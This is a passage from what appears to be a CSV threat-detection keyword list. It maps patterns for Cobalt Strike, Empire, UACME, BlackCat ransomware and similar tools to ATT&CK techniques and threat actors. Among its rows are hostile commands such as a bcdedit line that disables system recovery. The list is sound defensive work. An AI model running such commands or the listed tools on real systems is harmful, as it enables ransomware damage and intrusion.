adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bcdedit* /set {default} recoveryenabled No*","greyware_tool_keyword","bcdedit","Bcdedit is a command-line tool that enables users to view and make changes to boot configuration data (BCD) settings in Windows systems. Adversaries may leverage bcdedit to modify boot settings. such as enabling debug mode or disabling code integrity checks. as a means to bypass security mechanisms and gain persistence on the compromised system. By modifying the boot configuration. adversaries can evade detection and potentially maintain access to the system even after reboots.","T1218.004 - T1562.001","TA0007 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*bcdedit.exe /set {default} recoveryenabled No*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BCHASH-Rijndael-128.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*BCHASH-Rijndael-256.unverified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*bcrossc2_load_dyn*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" +"*BC-SECURITY*","offensive_tool_keyword","Github Username","Cybersecurity Engineers and Offensive Security enthusiasts actively maintaining/updating Powershell Empire in our spare time.","T1021 - T1024 - T1027 - T1059 - T1074 - T1053","TA0008 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BC-SECURITY","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*BC-SECURITY*Malleable*","offensive_tool_keyword","cobaltstrike","Malleable C2 Profiles. 
A collection of profiles used in different projects using Cobalt Strike & Empire.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*bc-security/empire*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - 
T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*BC-SECURITY/Starkiller*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" +"*bd346689-8ee6-40b3-858b-4ed94f08d40a*","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to 
forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" +"*BD602C80-47ED-4294-B981-0119D2200DB8*","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","0","N/A","9","2","129","24","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" +"*bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*BD745A5E-A1E9-4FDD-A15B-E9F303A625AE*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd745a5e-a1e9-4fdd-a15b-e9f303a625ae*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - 
T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*bdamele/icmpsh*","offensive_tool_keyword","icmpsh","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/r00t-3xp10it/venom","1","1","N/A","10","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*bdcsync*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdlcnpceagnkjnjlbbbcepohejbheilk*","greyware_tool_keyword","Malus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*bdllinject*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllinject*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - 
T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdllload*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllload*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security 
assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*bdllspawn*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" +"*bdllspawn*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*be93e59137554e3f45e8c6fbc22f0fbe42a1dfa8e457e60894bfda1388d61a1e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation 
tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Beacon Payload Generator*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*beacon.*winsrv.dll*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" 
+"*beacon.CommandBuilder*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*beacon.dll*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*beacon.elf*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"*beacon.exe*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 